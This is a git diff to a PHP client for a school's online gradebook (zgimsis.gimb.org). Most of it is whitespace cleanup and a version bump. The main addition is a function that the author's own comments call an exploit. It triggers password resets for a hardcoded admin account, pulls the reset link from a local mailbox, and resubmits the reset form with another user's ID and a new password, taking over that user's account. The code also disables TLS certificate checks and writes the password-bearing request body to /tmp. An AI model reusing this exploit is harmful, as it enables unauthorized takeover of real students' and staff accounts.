diff options
-rw-r--r-- | main.php | 104 |
1 files changed, 95 insertions, 9 deletions
@@ -14,14 +14,14 @@ function strip_tags_content($text, $tags = '', $invert = FALSE) { return preg_replace('@<(\w+)\b.*?>.*?</\1>@si', '', $text); } return $text; -} -function DOMinnerHTML(DOMNode $element) { - $innerHTML = ""; +} +function DOMinnerHTML(DOMNode $element) { + $innerHTML = ""; $children = $element->childNodes; - foreach ($children as $child) { + foreach ($children as $child) { $innerHTML .= $element->ownerDocument->saveHTML($child); } - return $innerHTML; + return $innerHTML; } function endsWith($haystack, $needle) { $length = strlen($needle); @@ -30,9 +30,9 @@ function endsWith($haystack, $needle) { } return (substr($haystack, -$length) === $needle); } -function startsWith ($string, $startString) { - $len = strlen($startString); - return (substr($string, 0, $len) === $startString); +function startsWith ($string, $startString) { + $len = strlen($startString); + return (substr($string, 0, $len) === $startString); } function get_string_between($string, $start, $end){ $string = ' ' . $string; @@ -53,11 +53,13 @@ Errors: */ class gimsisextClient { private $username; + private $adminusername = "anton.sijanec"; private $password; - public $version = array(0, 9, 3); + public $version = array(0, 10, 0); private $programname = "gimsisextclient"; private $programdomain = 'gimsisextclient.gimb.tk'; private $cookiedir; // set at runtime, ker je get_curerent_user, v login() + private $mailbox = "/home/gimb/Mailbox"; private $gimsisextlogin = "https://zgimsis.gimb.org/gse/Logon.aspx"; private $gimsisexturnik = "https://zgimsis.gimb.org/gse/Page_Gim/Ucenec/DnevnikUcenec.aspx"; private $gimsisextocenjevanja = "https://zgimsis.gimb.org/gse/Page_Gim/Ucenec/IzpitiUcenec.aspx"; @@ -713,6 +715,7 @@ Errors: $xmlDoc = new DOMDocument(); $xmlDoc->loadHTML( $resetgeslo_init_output ); $searchNode = $xmlDoc->getElementsByTagName( "input" ); + $postvars = ""; foreach( $searchNode as $sn ) { if($sn->getAttribute('name') != 'edtGSEUserId') { $postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($sn->getAttribute('value'))."&"; @@ -731,6 +734,89 @@ Errors: if(strlen($odg) < strlen($odg2)) return $odg2; } } + private function parselastresetemail() { + $path = $this->mailbox."/new"; + $latest_ctime = 0; + $latest_filename = ''; + $d = dir($path); + while (false !== ($entry = $d->read())) { + $filepath = "{$path}/{$entry}"; + // could do also other checks than just checking whether the entry is a file + if (is_file($filepath) && filectime($filepath) > $latest_ctime) { + $latest_ctime = filectime($filepath); + $latest_filename = $entry; + } + } + $fajl = file($this->mailbox."/new/".$latest_filename); + if (!$fajl) return false; + $mejl = preg_replace('/\s+/','',base64_decode(implode("", array_slice($fajl, 1+array_search(1, array_map("strlen", $fajl)))))); + $datum = get_string_between($mejl, "o<b>", "ob"); + $ura = get_string_between($mejl, "ob", "</b>."); + if (new DateTime > new DateTime($datum." ".$ura)) { + return false; + } + $link = get_string_between($mejl, "a'href='", "'>z"); + return $link; + } + public function spremenigeslo($user, $newpass) { // exploit // delam na tem + $plre = $this->parselastresetemail(); + while($plre == false) { + $this->resetgeslo($this->adminusername); + $plre = $this->parselastresetemail(); + } + /* + $this->cookiedir = '/tmp/'.posix_getuid().'/'.$this->programdomain.'/cookiedir/'; + if (!is_dir($this->cookiedir."spremenigeslo")) { + if (!mkdir($this->cookiedir.$this->username, 0700, true)) { // x permišn mora bit', da lahko dela poddirektorije, hence true, hence 0700; group in $ + return -5; + } + } + */ + $ch = curl_init(); + curl_setopt($ch, CURLOPT_SSLVERSION, CURL_SSLVERSION_TLSv1_0); + curl_setopt($ch, CURLOPT_COOKIESESSION, true ); + curl_setopt($ch, CURLOPT_COOKIEJAR, $this->cookiedir."spremenigeslo"."/cookie.txt" ); // cookiejar + curl_setopt($ch, CURLOPT_COOKIEFILE, $this->cookiedir."spremenigeslo"."/cookie.txt" ); // coolie file // this scuks + curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); + curl_setopt($ch, CURLOPT_VERBOSE, TRUE); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return transfer? + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // follow 3xx redirects? + curl_setopt($ch, CURLOPT_MAXREDIRS, 10); // max 3xx redirectas? + curl_setopt($ch, CURLOPT_USERAGENT, $this->programdomain."/".implode(".", $this->version)); + curl_setopt($ch, CURLOPT_AUTOREFERER, 1); // auto send refereres? + curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); // timeout for tcp connection + curl_setopt($ch, CURLOPT_TIMEOUT, 10); // timeout for http response + curl_setopt($ch, CURLOPT_URL, $plre); + curl_setopt($ch, CURLOPT_POST, 0); + $spremenigeslo_init_output = curl_exec($ch); + $xmlDoc = new DOMDocument(); + $xmlDoc->loadHTML( $spremenigeslo_init_output ); + $searchNode = $xmlDoc->getElementsByTagName( "input" ); + $postvars = ""; + foreach( $searchNode as $sn ) { + if($sn->getAttribute('name') == 'hfIdUporabnik') { + $postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($user)."&"; + } else if($sn->getAttribute("name") == "edtGSEPassword") { + $postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($newpass)."&"; + } else if($sn->getAttribute("name") == "edtGSEPassword2") { + $postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($newpass)."&"; + } else { + $postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($sn->getAttribute('value'))."&"; + } + } + curl_setopt($ch, CURLOPT_URL, explode("?", $plre)[0]); // <!-- ključ exploita. Server inč ne javka, če GET parametrov ni... 1337 h@x3d xD <3 + curl_setopt($ch, CURLOPT_POST, 1); + $postbody = "__EVENTTARGET=&__EVENTARGUMENT=&".substr($postvars, 0, -1); // ker ne rabmo zadnjega & + curl_setopt($ch, CURLOPT_POSTFIELDS, $postbody); + $spremenigeslo_output = curl_exec($ch); + file_put_contents("/tmp/222.html", $postbody); + if(get_string_between($spremenigeslo_output, "Geslo je z", "menjano") == "a") { + return true; + } else { + return false; + } + } public function fetchocene() { $ch = $this->login(); if(!curl_getinfo($ch)) { |